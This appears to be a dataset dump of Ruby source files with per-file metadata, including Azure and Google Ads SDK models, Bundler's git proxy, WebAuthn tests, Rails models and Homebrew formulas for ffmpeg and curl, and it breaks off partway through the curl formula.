hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
7aa24f9d9fddf3139062a19e0aae039a030c7965 | 417 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2019_09_01
module Models
#
# Defines values for ExpressRouteCircuitSkuFamily
#
module ExpressRouteCircuitSkuFamily
UnlimitedData = "UnlimitedData"
MeteredData = "MeteredData"
end
end
end
| 24.529412 | 70 | 0.731415 |
117de657b7e0311258142e1c0a5726df2f2d3205 | 1,098 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 3) do
create_table "equipments", force: :cascade do |t|
t.string "name"
end
create_table "exercises", force: :cascade do |t|
t.string "name"
t.string "description"
t.integer "equipment_id"
t.integer "muscle_group_id"
end
create_table "muscle_groups", force: :cascade do |t|
t.string "name"
end
end
| 35.419355 | 86 | 0.752277 |
189026e7d3be3e141a474469c9c21739b8e87e97 | 689 | class Animal # ENCAPSULATION
attr_reader :species
def move # POLYMORPHISM
puts 'Animal moves'
end
def consume(food = nil) # POLYMORPHISM
puts "I consume #{food} like a savage" if food
end
private # Abstraction / Information Hiding
def initialize(species)
@species = species
end
end
class Human < Animal # Inheritance
attr_reader :name
def move # POLYMORPHISM
puts 'Human moves'
super
end
def consume(food) # POLYMORPHISM
puts 'We are not savages'
super('apple')
end
private # Abstraction / Information Hiding
def initialize(name)
@name = name
super('human')
end
end
p kelly = Human.new("Kelly")
kelly.consume()
| 16.404762 | 50 | 0.677794 |
6ae67ac4d980a589660b977e93ee636146f1a9d5 | 1,561 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::BatchAI::Mgmt::V2018_03_01
module Models
#
# Describes a reference to Key Vault Key.
#
class KeyVaultKeyReference
include MsRestAzure
# @return [ResourceId] Fully qualified resource Id for the Key Vault.
attr_accessor :source_vault
# @return [String] The URL referencing a key in a Key Vault.
attr_accessor :key_url
#
# Mapper for KeyVaultKeyReference class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'KeyVaultKeyReference',
type: {
name: 'Composite',
class_name: 'KeyVaultKeyReference',
model_properties: {
source_vault: {
client_side_validation: true,
required: true,
serialized_name: 'sourceVault',
type: {
name: 'Composite',
class_name: 'ResourceId'
}
},
key_url: {
client_side_validation: true,
required: true,
serialized_name: 'keyUrl',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 26.457627 | 75 | 0.532992 |
79c8a33404d40d8c3ca9715212db56e64b756d0b | 5,472 | module Bundler
module Source
class Git < Path
class GitNotInstalledError < GitError
def initialize
msg = "You need to install git to be able to use gems from git repositories. "
msg << "For help installing git, please refer to GitHub's tutorial at https://help.github.com/articles/set-up-git"
super msg
end
end
class GitNotAllowedError < GitError
def initialize(command)
msg = "Bundler is trying to run a `git #{command}` at runtime. You probably need to run `bundle install`. However, "
msg << "this error message could probably be more useful. Please submit a ticket at http://github.com/bundler/bundler/issues "
msg << "with steps to reproduce as well as the following\n\nCALLER: #{caller.join("\n")}"
super msg
end
end
class GitCommandError < GitError
def initialize(command, path = nil)
msg = "Git error: command `git #{command}` in directory #{Dir.pwd} has failed."
msg << "\nIf this error persists you could try removing the cache directory '#{path}'" if path && path.exist?
super msg
end
end
# The GitProxy is responsible to iteract with git repositories.
# All actions required by the Git source is encapsualted in this
# object.
class GitProxy
attr_accessor :path, :uri, :ref
attr_writer :revision
def initialize(path, uri, ref, revision=nil, &allow)
@path = path
@uri = uri
@ref = ref
@revision = revision
@allow = allow || Proc.new { true }
end
def revision
@revision ||= allowed_in_path { git("rev-parse #{ref}").strip }
end
def branch
@branch ||= allowed_in_path do
git("branch") =~ /^\* (.*)$/ && $1.strip
end
end
def contains?(commit)
allowed_in_path do
result = git_null("branch --contains #{commit}")
$? == 0 && result =~ /^\* (.*)$/
end
end
def checkout
if path.exist?
return if has_revision_cached?
Bundler.ui.info "Updating #{uri}"
in_path do
git %|fetch --force --quiet --tags #{uri_escaped} "refs/heads/*:refs/heads/*"|
end
else
Bundler.ui.info "Fetching #{uri}"
FileUtils.mkdir_p(path.dirname)
clone_command = %|clone #{uri_escaped} "#{path}" --bare --no-hardlinks|
clone_command = "#{clone_command} --quiet" if Bundler.ui.quiet?
git clone_command
end
end
def copy_to(destination, submodules=false)
unless File.exist?(destination.join(".git"))
FileUtils.mkdir_p(destination.dirname)
FileUtils.rm_rf(destination)
git %|clone --no-checkout "#{path}" "#{destination}"|
File.chmod((0777 & ~File.umask), destination)
end
SharedHelpers.chdir(destination) do
git %|fetch --force --quiet --tags "#{path}"|
git "reset --hard #{@revision}"
if submodules
git "submodule update --init --recursive"
end
end
end
private
# TODO: Do not rely on /dev/null.
# Given that open3 is not cross platform until Ruby 1.9.3,
# the best solution is to pipe to /dev/null if it exists.
# If it doesn't, everything will work fine, but the user
# will get the $stderr messages as well.
def git_null(command)
if !Bundler::WINDOWS && File.exist?("/dev/null")
git("#{command} 2>/dev/null", false)
else
git(command, false)
end
end
def git(command, check_errors=true)
raise GitNotAllowedError.new(command) unless allow?
raise GitNotInstalledError.new unless Bundler.git_present?
Bundler::Retry.new("git #{command}").attempts do
out = SharedHelpers.with_clean_git_env { %x{git #{command}} }
raise GitCommandError.new(command, path) if check_errors && !$?.success?
out
end
end
def has_revision_cached?
return unless @revision
in_path { git("cat-file -e #{@revision}") }
true
rescue GitError
false
end
# Escape the URI for git commands
def uri_escaped
if Bundler::WINDOWS
# Windows quoting requires double quotes only, with double quotes
# inside the string escaped by being doubled.
'"' + uri.gsub('"') {|s| '""'} + '"'
else
# Bash requires single quoted strings, with the single quotes escaped
# by ending the string, escaping the quote, and restarting the string.
"'" + uri.gsub("'") {|s| "'\\''"} + "'"
end
end
def allow?
@allow.call
end
def in_path(&blk)
checkout unless path.exist?
SharedHelpers.chdir(path, &blk)
end
def allowed_in_path
if allow?
in_path { yield }
else
raise GitError, "The git source #{uri} is not yet checked out. Please run `bundle install` before trying to start your application"
end
end
end
end
end
end
| 33.570552 | 143 | 0.55117 |
ed1f8c806b90a41163ff2e7e5f8ad4ab1099a663 | 5,132 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
module Google
module Ads
module GoogleAds
module V8
module Services
# Request message for {::Google::Ads::GoogleAds::V8::Services::SmartCampaignSettingService::Client#get_smart_campaign_setting SmartCampaignSettingService.GetSmartCampaignSetting}.
# @!attribute [rw] resource_name
# @return [::String]
# Required. The resource name of the Smart campaign setting to fetch.
class GetSmartCampaignSettingRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Request message for
# [SmartCampaignSettingService.MutateSmartCampaignSetting][].
# @!attribute [rw] customer_id
# @return [::String]
# Required. The ID of the customer whose Smart campaign settings are being modified.
# @!attribute [rw] operations
# @return [::Array<::Google::Ads::GoogleAds::V8::Services::SmartCampaignSettingOperation>]
# Required. The list of operations to perform on individual Smart campaign settings.
# @!attribute [rw] partial_failure
# @return [::Boolean]
# If true, successful operations will be carried out and invalid
# operations will return errors. If false, all operations will be carried
# out in one transaction if and only if they are all valid.
# Default is false.
# @!attribute [rw] validate_only
# @return [::Boolean]
# If true, the request is validated but not executed. Only errors are
# returned, not results.
# @!attribute [rw] response_content_type
# @return [::Google::Ads::GoogleAds::V8::Enums::ResponseContentTypeEnum::ResponseContentType]
# The response content type setting. Determines whether the mutable resource
# or just the resource name should be returned post mutation.
class MutateSmartCampaignSettingsRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# A single operation to update Smart campaign settings for a campaign.
# @!attribute [rw] update
# @return [::Google::Ads::GoogleAds::V8::Resources::SmartCampaignSetting]
# Update operation: The Smart campaign setting must specify a valid
# resource name.
# @!attribute [rw] update_mask
# @return [::Google::Protobuf::FieldMask]
# FieldMask that determines which resource fields are modified in an update.
class SmartCampaignSettingOperation
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Response message for campaign mutate.
# @!attribute [rw] partial_failure_error
# @return [::Google::Rpc::Status]
# Errors that pertain to operation failures in the partial failure mode.
# Returned only when partial_failure = true and all errors occur inside the
# operations. If any errors occur outside the operations (e.g. auth errors),
# we return an RPC level error.
# @!attribute [rw] results
# @return [::Array<::Google::Ads::GoogleAds::V8::Services::MutateSmartCampaignSettingResult>]
# All results for the mutate.
class MutateSmartCampaignSettingsResponse
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# The result for the Smart campaign setting mutate.
# @!attribute [rw] resource_name
# @return [::String]
# Returned for successful operations.
# @!attribute [rw] smart_campaign_setting
# @return [::Google::Ads::GoogleAds::V8::Resources::SmartCampaignSetting]
# The mutated Smart campaign setting with only mutable fields after mutate.
# The field will only be returned when response_content_type is set to
# "MUTABLE_RESOURCE".
class MutateSmartCampaignSettingResult
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
end
end
end
end
| 47.962617 | 189 | 0.643804 |
01f97569b7f18a5bb26625248c1ffd80677ff5cf | 501 | # frozen_string_literal: true
require 'vk/api/responses'
module Vk
module API
class Wall < Vk::Schema::Namespace
module Responses
# @see https://github.com/VKCOM/vk-api-schema/blob/master/objects.json
class UnpinResponse < Vk::Schema::Response
# @return [API::Base::OkResponse] @see https://github.com/VKCOM/vk-api-schema/blob/master/objects.json
attribute :response, API::Base::OkResponse.optional.default(nil)
end
end
end
end
end
| 29.470588 | 112 | 0.670659 |
080b3701370ee600bef6f5a93fb434d6a7efe9af | 1,003 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended to check this file into your version control system.
ActiveRecord::Schema.define(:version => 20120906224210) do
create_table "contenteditable_contents", :force => true do |t|
t.string "key"
t.text "value"
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
end
end
| 41.791667 | 86 | 0.754736 |
bfa32dfebd3bd0b99ed3f284de744404ac7003d0 | 383 | name 'ctf01-01'
maintainer 'Stefan Rusu'
maintainer_email '[email protected]'
license 'MIT'
description 'Installs / Configures ctf01-01'
long_description 'Installs / Configures ctf01-01'
version '0.1.1'
source_url 'https://github.com/SaltwaterC/hackers-dome-images'
issues_url 'https://github.com/SaltwaterC/hackers-dome-images/issues'
chef_version '12.12.15'
supports 'centos'
| 27.357143 | 69 | 0.788512 |
d54bd261c435d7424f39e61a14e175cb6738e789 | 5,379 | # frozen_string_literal: true
require 'spec_helper'
require 'webauthn/public_key'
require 'support/seeds'
require 'cose'
require 'openssl'
RSpec.describe 'PublicKey' do
let(:uncompressed_point_public_key) do
Base64.strict_decode64(seeds[:u2f_migration][:stored_credential][:public_key])
end
let(:cose_public_key) do
Base64.urlsafe_decode64(
'pQECAyYgASFYIPJKd_-Rl0QtQwbLggjGC_EbUFIMriCkdc2yuaukkBuNIlggaBsBjCwnMzFL7OUGJNm4b-HVpFNUa_NbsHGARuYKHfU'
)
end
let(:webauthn_public_key) { WebAuthn::PublicKey.deserialize(public_key) }
describe '.deserialize' do
context 'when invalid public key' do
let(:public_key) { 'invalidinvalid' }
it 'should fail' do
expect { webauthn_public_key }.to raise_error(COSE::MalformedKeyError)
end
end
end
describe '#pkey' do
let(:pkey) { webauthn_public_key.pkey }
context 'when public key stored in uncompressed point format' do
let(:public_key) { uncompressed_point_public_key }
it 'should return ssl pkey' do
expect(pkey).to be_instance_of(OpenSSL::PKey::EC)
end
end
context 'when public key stored in cose format' do
let(:public_key) { cose_public_key }
it 'should return ssl pkey' do
expect(pkey).to be_instance_of(OpenSSL::PKey::EC)
end
end
end
describe '#cose_key' do
let(:cose_key) { webauthn_public_key.cose_key }
context 'when public key stored in uncompressed point format' do
let(:public_key) { uncompressed_point_public_key }
it 'should return EC2 cose key' do
expect(cose_key).to be_instance_of(COSE::Key::EC2)
end
end
context 'when public key stored in cose format' do
let(:public_key) { cose_public_key }
it 'should return cose key' do
expect(cose_key).to be_a(COSE::Key::Base)
end
end
end
describe '#alg' do
let(:alg) { webauthn_public_key.alg }
context 'when public key stored in uncompressed point format' do
let(:public_key) { uncompressed_point_public_key }
it 'should return ES256 cose algorithm id' do
expect(alg).to eq(COSE::Algorithm.by_name('ES256').id)
end
end
context 'when public key stored in cose format' do
let(:public_key) { cose_public_key }
it 'should return cose algorithm id' do
expect(alg).to be_a(Integer)
end
end
end
describe '#verify' do
context 'when public key stored in uncompressed point format' do
let(:public_key) { uncompressed_point_public_key }
context 'when signature was signed with public key' do
let(:signature) do
Base64.strict_decode64(seeds[:u2f_migration][:assertion][:response][:signature])
end
let(:authenticator_data) do
Base64.strict_decode64(seeds[:u2f_migration][:assertion][:response][:authenticator_data])
end
let(:client_data_hash) do
WebAuthn::ClientData.new(
Base64.strict_decode64(seeds[:u2f_migration][:assertion][:response][:client_data_json])
).hash
end
let(:verification_data) { authenticator_data + client_data_hash }
it 'should verify' do
expect(
webauthn_public_key.verify(signature, verification_data)
).to be_truthy
end
end
end
context 'when public key stored in cose format' do
let(:signature) { key.sign(hash_algorithm, to_be_signed) }
let(:to_be_signed) { 'data' }
let(:hash_algorithm) do
COSE::Algorithm.find('ES256').hash_function
end
let(:cose_key) do
cose_key = COSE::Key::EC2.from_pkey(key.public_key)
cose_key.alg = -7
cose_key
end
let(:key) { OpenSSL::PKey::EC.new('prime256v1').generate_key }
let(:webauthn_public_key) { WebAuthn::PublicKey.new(cose_key: cose_key) }
it 'works' do
expect(webauthn_public_key.verify(signature, to_be_signed)).to be_truthy
end
context 'when it was signed using a different hash algorithm' do
let(:hash_algorithm) { 'SHA1' }
it 'fails' do
expect(webauthn_public_key.verify(signature, to_be_signed)).to be_falsy
end
end
context 'when it was signed with a different key' do
let(:signature) do
OpenSSL::PKey::EC.new('prime256v1').generate_key.sign(
hash_algorithm,
to_be_signed
)
end
it 'fails' do
expect(webauthn_public_key.verify(signature, to_be_signed)).to be_falsy
end
end
context 'when it was signed over different data' do
let(:signature) { key.sign(hash_algorithm, 'different data') }
it 'fails' do
expect(webauthn_public_key.verify(signature, to_be_signed)).to be_falsy
end
end
context 'when public key algorithm is not in COSE' do
let(:cose_key) do
cose_key = COSE::Key::EC2.from_pkey(key.public_key)
cose_key.alg = -1
cose_key
end
it 'fails' do
expect { webauthn_public_key.verify(signature, to_be_signed) }.to(
raise_error(
WebAuthn::PublicKey::UnsupportedAlgorithm,
'The public key algorithm -1 is not among the available COSE algorithms'
)
)
end
end
end
end
end
| 29.075676 | 111 | 0.648819 |
62e7859689ecc6e30468f1171ecb55f3b54e94e4 | 2,992 | module UniversalCrm
module Models
module Company
extend ActiveSupport::Concern
included do
include Mongoid::Document
include Mongoid::Timestamps
include Mongoid::Search
include Universal::Concerns::Status
include Universal::Concerns::Kind
include Universal::Concerns::Numbered
include Universal::Concerns::Taggable
include Universal::Concerns::Flaggable
include Universal::Concerns::Scoped
include Universal::Concerns::Polymorphic
include Universal::Concerns::Commentable
include Universal::Concerns::Employer
include Universal::Concerns::Tokened
include Universal::Concerns::HasAttachments
include Universal::Concerns::Addressed
store_in session: UniversalCrm::Configuration.mongoid_session_name, collection: 'crm_companies'
field :n, as: :name
field :e, as: :email
field :p, as: :phone
has_many :tickets, as: :subject, class_name: 'UniversalCrm::Ticket'
search_in :n, :e
statuses %w(active draft blocked), default: :active
validates :name, presence: true
validates_uniqueness_of :email, allow_blank: true, scope: [:scope_type, :scope_id]
# numbered_prefix 'CP'
# default_scope ->(){order_by(created_at: :desc)}
def inbound_email_address(config)
"cp-#{self.token}@#{config.inbound_domain}"
end
def to_json(config)
return {
id: self.id.to_s,
number: self.number.to_s,
status: self.status,
name: self.name,
email: self.email,
phone: self.phone,
tags: self.tags,
flags: self.flags,
ticket_count: self.tickets.count,
token: self.token,
inbound_email_address: self.inbound_email_address(config),
closed_ticket_count: self.tickets.unscoped.closed.count,
employee_ids: self.employee_ids,
employees: self.employees_json,
address: self.address,
subject_type: self.subject_type,
subject_id: self.subject_id.to_s
}
end
def employees_json
a=[]
self.employees.each do |e|
a.push({
id: e.id.to_s,
name: e.name,
email: e.email,
type: e.class.to_s,
open_ticket_count: e.tickets.active.count
})
end
return a
end
def block!(user)
self.comments.create content: 'Company blocked', author: user.name, when: Time.now.utc
self.blocked!
end
def unblock!(user)
self.comments.create content: 'Company unblocked', author: user.name, when: Time.now.utc
self.active!
end
end
end
end
end | 31.829787 | 103 | 0.572193 |
3988169fefe94b213aed24756df02d019cdfd0d1 | 2,181 | #Copyright 2010 Foradian Technologies Private Limited
#This product includes software developed at
#Project Fedena - http://www.projectfedena.org/
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
# FedenaLibrary
require File.join(RAILS_ROOT, "app","models","student.rb")
require File.join(RAILS_ROOT, "app","models","hr","employee.rb")
require File.join(RAILS_ROOT, "app","models","user.rb")
User.send :has_many,:book_movements, :dependent=>:destroy
User.send :has_many,:book_reservations, :dependent=>:destroy
User.send :before_destroy , :clear_book_movements
Student.send :has_many,:book_movements, :through=>:user
Student.send :has_many,:book_reservations, :through=>:user
Employee.send :has_many,:book_movements, :through=>:user
Employee.send :has_many,:book_reservations, :through=>:user
class FedenaLibrary
unloadable
def self.student_profile_hook
"shared/student_profile"
end
def self.student_dependency_hook
"shared/student_dependency"
end
def self.employee_dependency_hook
"shared/employee_dependency"
end
def self.dependency_check(record,type)
if record.class.to_s == "Student" or record.class.to_s == "Employee"
return true if record.book_movements.all(:conditions=>"status = 'Issued'").present?
end
return false
end
end
module FedenaLibraryBookMovement
def issued_books
self.book_movements.all(:conditions=>"status = 'Issued'")
end
end
class Student
unloadable
include FedenaLibraryBookMovement
end
class Employee
unloadable
include FedenaLibraryBookMovement
end
class User
unloadable
def clear_book_movements
self.book_movements.destroy_all
self.book_reservations.destroy_all
end
end
| 28.697368 | 89 | 0.770289 |
b984b4d5dcbdca0ff99b382a0d8c28b80f71afdf | 78 | # coding: utf-8
module FormData
# FormData version
VERSION = "0.1.0"
end
| 11.142857 | 20 | 0.666667 |
11662e539b601762f756010f7e66c9cf818d5d22 | 2,019 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::EventHub::Mgmt::V2017_04_01
module Models
#
# SKU parameters supplied to the create namespace operation
#
class Sku
include MsRestAzure
# @return [SkuName] Name of this SKU. Possible values include: 'Basic',
# 'Standard'
attr_accessor :name
# @return [SkuTier] The billing tier of this particular SKU. Possible
# values include: 'Basic', 'Standard'
attr_accessor :tier
# @return [Integer] The Event Hubs throughput units, value should be 0 to
# 20 throughput units.
attr_accessor :capacity
#
# Mapper for Sku class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'Sku',
type: {
name: 'Composite',
class_name: 'Sku',
model_properties: {
name: {
client_side_validation: true,
required: true,
serialized_name: 'name',
type: {
name: 'String'
}
},
tier: {
client_side_validation: true,
required: false,
serialized_name: 'tier',
type: {
name: 'String'
}
},
capacity: {
client_side_validation: true,
required: false,
serialized_name: 'capacity',
constraints: {
InclusiveMaximum: 20,
InclusiveMinimum: 0
},
type: {
name: 'Number'
}
}
}
}
}
end
end
end
end
| 26.565789 | 79 | 0.493314 |
f83842ca4a28ca9f65a893b54a3a4a8470a24c41 | 735 | module ActiveRecord::Turntable
class Mixer
class Fader
class CalculateShardsSumResult < Fader
def execute
results = @shards_query_hash.map do |shard, query|
args = @args.dup
args[1] = args[1].dup if args[1].present?
shard.connection.send(@called_method, query, *@args, &@block)
end
merge_results(results)
end
private
def merge_results(results)
ActiveRecord::Result.new(
results.first.columns,
results[0].rows.zip(*results[1..-1].map(&:rows)).map { |r| [r.map(&:first).inject(&:+)] },
results.first.column_types
)
end
end
end
end
end
| 27.222222 | 104 | 0.542857 |
626b9c0a2fb1f1694d5d5ca8534255c31a5fe60b | 2,677 | # frozen_string_literal: true
# A collection of class methods that will be available on classes that include `AwesomeXML`.
module AwesomeXML
module ClassMethods
attr_reader :context, :nodes, :public_nodes
private :nodes, :public_nodes
# Takes in a string representing an XML document. Initializes an instance of the class
# the module was included in and calls `#parse` on it. See there for more info.
def parse(xml)
new(xml).parse
end
# Takes in a string representing an XPath and assigns it to the class variable `@@context`.
# This sets the current context node for all nodes defined below it in the class this
# module is included in.
def set_context(xpath)
@context ||= xpath
end
# Works just like `set_context`, but sets the current context node only for nodes defined
# inside the block passed to this method.
def with_context(xpath, &block)
@local_context = xpath
yield
@local_context = nil
end
# Defines a method on your class returning a constant.
def constant_node(name, value, options = {})
attr_reader name.to_sym
define_method("parse_#{name}".to_sym) do
instance_variable_set("@#{name}", value)
end
register(name, options[:private])
end
# Does not actually define a method, but registers the node name
# in the `@nodes` attribute.
def method_node(name)
define_method("parse_#{name}".to_sym) {}
register(name, false)
end
# Defines a method on your class returning a parsed value
def node(name, type, options = {}, &block)
attr_reader name.to_sym
options[:local_context] = @local_context
xpath = NodeXPath.new(name, options).xpath
define_method("parse_#{name}".to_sym) do
evaluate_args = [xpath, AwesomeXML::Type.for(type, self.class.name), options]
instance_variable_set(
"@#{name}",
evaluate_nodes(*evaluate_args, &block)
)
end
register(name, options[:private])
end
# Returns an array of symbols containing all method names defined by node builder methods
# in your class.
def nodes
@nodes ||= []
end
# Returns an array of symbols containing all method names defined by node builder methods
# in your class. Does not list nodes built with option `:private`.
def public_nodes
@public_nodes ||= []
end
def parsing_type?
false
end
private
def register(node_name, privateness)
@nodes ||= []
@nodes << node_name.to_sym
@public_nodes ||= []
@public_nodes << node_name.to_sym unless privateness
end
end
end
| 30.770115 | 95 | 0.663056 |
393c04de0c5c9c933efa29b3c9772e43150f7adb | 4,532 | class Ffmpeg < Formula
desc "Play, record, convert, and stream audio and video"
homepage "https://ffmpeg.org/"
url "https://ffmpeg.org/releases/ffmpeg-4.4.1.tar.xz"
sha256 "eadbad9e9ab30b25f5520fbfde99fae4a92a1ae3c0257a8d68569a4651e30e02"
# None of these parts are used by default, you have to explicitly pass `--enable-gpl`
# to configure to activate them. In this case, FFmpeg's license changes to GPL v2+.
license "GPL-2.0-or-later"
revision 3
head "https://github.com/FFmpeg/FFmpeg.git"
livecheck do
url "https://ffmpeg.org/download.html"
regex(/href=.*?ffmpeg[._-]v?(\d+(?:\.\d+)+)\.t/i)
end
bottle do
sha256 arm64_monterey: "3f0fd439dab73037bf1577aeef75fe61693a8c7d231db15355685aa27d998503"
sha256 arm64_big_sur: "595897c60fd28be047977306a35e53fc6f6f29b021af7b0ee542719bf892eca4"
sha256 monterey: "d86a545fd61b459c1adafcec61bf1803f8f632fe527a88682af4fb89c37056fd"
sha256 big_sur: "b3e866d21b8a51653e294e08c8be65e5095894f52f6cb6b914025992191c1c50"
sha256 catalina: "ea2431a650ae91eb8ea197d7e1d8e82f50d5dfdaad08a0da7c067609e8b1922f"
sha256 x86_64_linux: "a91fa175c2f2a47c9afd240bf2cf97064b14647077be5804da159b6a4244fe62"
end
depends_on "nasm" => :build
depends_on "pkg-config" => :build
depends_on "aom"
depends_on "dav1d"
depends_on "fontconfig"
depends_on "freetype"
depends_on "frei0r"
depends_on "gnutls"
depends_on "lame"
depends_on "libass"
depends_on "libbluray"
depends_on "librist"
depends_on "libsoxr"
depends_on "libvidstab"
depends_on "libvmaf"
depends_on "libvorbis"
depends_on "fdk-aac"
depends_on "libvpx"
depends_on "opencore-amr"
depends_on "openjpeg"
depends_on "opus"
depends_on "rav1e"
depends_on "rubberband"
depends_on "sdl2"
depends_on "snappy"
depends_on "speex"
depends_on "srt"
depends_on "tesseract"
depends_on "theora"
depends_on "webp"
depends_on "x264"
depends_on "x265"
depends_on "xvid"
depends_on "xz"
depends_on "zeromq"
depends_on "zimg"
uses_from_macos "bzip2"
uses_from_macos "libxml2"
uses_from_macos "zlib"
on_linux do
depends_on "libxv"
end
def install
args = %W[
--prefix=#{prefix}
--enable-shared
--enable-pthreads
--enable-version3
--cc=#{ENV.cc}
--host-cflags=#{ENV.cflags}
--host-ldflags=#{ENV.ldflags}
--enable-ffplay
--enable-gnutls
--enable-gpl
--enable-libaom
--enable-libbluray
--enable-libdav1d
--enable-libmp3lame
--enable-libopus
--enable-librav1e
--enable-librist
--enable-librubberband
--enable-libsnappy
--enable-libsrt
--enable-libtesseract
--enable-libtheora
--enable-libvidstab
--enable-libvmaf
--enable-libvorbis
--enable-libfdk-aac
--enable-libvpx
--enable-libwebp
--enable-libx264
--enable-libx265
--enable-libxml2
--enable-libxvid
--enable-lzma
--enable-libfontconfig
--enable-libfreetype
--enable-frei0r
--enable-libass
--enable-libopencore-amrnb
--enable-libopencore-amrwb
--enable-libopenjpeg
--enable-libspeex
--enable-libsoxr
--enable-libzmq
--enable-libzimg
--disable-libjack
--disable-indev=jack
--enable-nonfree
]
# libavresample has been deprecated and removed but some non-updated formulae are still linked to it
# Remove in the next release
args << "--enable-avresample" unless build.head?
# Needs corefoundation, coremedia, corevideo
args << "--enable-videotoolbox" if OS.mac?
# Replace hardcoded default VMAF model path
%w[doc/filters.texi libavfilter/vf_libvmaf.c].each do |f|
inreplace f, "/usr/local/share/model", HOMEBREW_PREFIX/"share/libvmaf/model"
# Since libvmaf v2.0.0, `.pkl` model files have been deprecated in favor of `.json` model files.
inreplace f, "vmaf_v0.6.1.pkl", "vmaf_v0.6.1.json"
end
system "./configure", *args
system "make", "install"
# Build and install additional FFmpeg tools
system "make", "alltools"
bin.install Dir["tools/*"].select { |f| File.executable? f }
# Fix for Non-executables that were installed to bin/
mv bin/"python", pkgshare/"python", force: true
end
test do
# Create an example mp4 file
mp4out = testpath/"video.mp4"
system bin/"ffmpeg", "-filter_complex", "testsrc=rate=1:duration=1", mp4out
assert_predicate mp4out, :exist?
end
end
| 29.428571 | 104 | 0.684907 |
b9f63f1a09e8b639197e6d4f5dd6d1ad11d86ee1 | 133 | class Post < ActiveRecord::Base
# Remember to create a migration!
belongs_to :user
belongs_to :ticket
has_many :comments
end
| 19 | 35 | 0.75188 |
28d9ce6371ee517948da0baf535a41db3d45b7bb | 4,804 | class Phpcurl < Formula
desc "Get a file from an HTTP, HTTPS or FTP server"
homepage "https://curl.haxx.se/"
url "https://curl.haxx.se/download/curl-7.72.0.tar.bz2"
mirror "http://curl.mirror.anstey.ca/curl-7.72.0.tar.bz2"
sha256 "ad91970864102a59765e20ce16216efc9d6ad381471f7accceceab7d905703ef"
version '7.72.0'
revision 2
pour_bottle? do
reason "The bottle needs to be installed into #{Homebrew::DEFAULT_PREFIX} when built with OpenSSL."
satisfy { OS.mac? || HOMEBREW_PREFIX.to_s == Homebrew::DEFAULT_PREFIX }
end
head do
url "https://github.com/curl/curl.git"
depends_on "[email protected]" => :build
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
end
keg_only "php only dependency"
option "with-rtmpdump", "Build with RTMP support"
option "with-libssh2", "Build with scp and sftp support"
option "with-c-ares", "Build with C-Ares async DNS support"
option "with-gssapi", "Build with GSSAPI/Kerberos authentication support."
option "with-libmetalink", "Build with libmetalink support."
option "with-nghttp2", "Build with HTTP/2 support (requires OpenSSL)"
deprecated_option "with-rtmp" => "with-rtmpdump"
deprecated_option "with-ssh" => "with-libssh2"
deprecated_option "with-ares" => "with-c-ares"
# HTTP/2 support requires OpenSSL 1.0.2+ or LibreSSL 2.1.3+ for ALPN Support
# which is currently not supported by Secure Transport (DarwinSSL).
# if MacOS.version < :mountain_lion || build.with?("nghttp2") || build.with?("openssl")
# depends_on "[email protected]"
# else
# option "with-openssl", "Build with OpenSSL instead of Secure Transport"
# depends_on "[email protected]" => :optional
# end
depends_on "[email protected]"
depends_on "pkg-config" => :build
depends_on "gcc@9" => :build
depends_on "c-ares" => :optional
depends_on "libmetalink" => :optional
depends_on "libssh2" => :optional
depends_on "nghttp2" => :optional
depends_on "rtmpdump" => :optional
unless OS.mac?
depends_on "krb5" if build.with? "gssapi"
